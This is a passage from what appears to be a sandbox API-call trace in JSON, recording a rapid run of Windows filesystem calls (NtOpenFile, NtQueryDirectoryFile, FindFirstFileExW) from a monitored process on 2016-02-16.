17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,134", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,144", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,154", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,164", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,174", "api": 